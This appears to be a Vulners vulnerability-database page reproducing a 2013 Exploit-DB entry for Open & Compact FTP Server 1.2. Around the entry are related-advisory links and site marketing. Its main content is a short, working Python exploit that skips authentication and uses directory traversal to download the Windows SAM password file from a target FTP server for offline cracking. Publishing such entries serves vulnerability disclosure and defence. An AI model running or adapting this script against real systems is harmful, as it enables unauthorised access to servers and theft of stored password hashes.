Lucene search
+L

(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval

🗓️ 07 Aug 2013 00:00:00Reported by WireghoulType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

Open&Compact FTP Server 1.2 authentication bypass and directory traversal SAM retrieva

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Open&Compact FTP Server 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit
7 Aug 201300:00
zdt
zdt
zdt
Open-FTPD 1.2 Arbitrary File Upload Vulnerability
13 Aug 201300:00
zdt
circl
Circl
CVE-2010-2620
18 Jun 201000:00
circl
cve
CVE
CVE-2010-2620
2 Jul 201020:00
cve
cvelist
Cvelist
CVE-2010-2620
2 Jul 201020:00
cvelist
exploitdb
Exploit DB
(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access
18 Jun 201000:00
exploitdb
exploitdb
Exploit DB
Open-FTPD 1.2 - Arbitrary File Upload (Metasploit)
13 Aug 201300:00
exploitdb
metasploit
Metasploit
Open-FTPD 1.2 Arbitrary File Upload
18 Jun 201200:00
metasploit
nvd
NVD
CVE-2010-2620
2 Jul 201020:30
nvd
openvas
OpenVAS
Open-FTPD Authentication Bypass Vulnerability
16 Jul 201000:00
openvas
Rows per page
#!/usr/bin/python
# Exploit Title: Open&Compact Ftp Server <= 1.2 Auth bypass & directory traversal sam retrieval
# Date: Aug 7, 2013
# By Wireghoul - http://www.justanotherhacker.com
# Based on Serge Gorbunov's auth bypass (http://www.exploit-db.com/exploits/13932/)
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3

# Abusing authentication bypass in combination with a directory traversal to grab
# the sam file for offline cracking

import ftplib
import os

# Connect to server

ftp = ftplib.FTP( "192.168.58.135" )
ftp.set_pasv( False )

# Note that we need no authentication at all!!

print ftp.sendcmd( 'CWD C:\\\\windows\\\\repair\\\\' )
print ftp.retrbinary('RETR sam', open('sam', 'wb').write )

ftp.quit()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Aug 2013 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 29.3
EPSS0.29555
41